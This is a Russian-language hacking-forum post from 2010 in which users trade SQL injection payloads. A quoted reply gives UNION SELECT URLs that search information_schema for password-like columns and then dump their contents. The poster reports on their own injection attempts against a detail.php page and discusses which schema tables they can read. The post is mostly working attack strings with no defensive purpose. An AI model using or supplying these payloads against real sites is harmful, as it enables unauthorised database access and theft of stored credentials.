12.07.2010, 00:01
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
Сообщение от Dare
Dare said:
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
Привет!
Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).
Интересное наблюдение:
Код:
Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+
работает, а
Код:
Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+
нет.
Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
|
|
|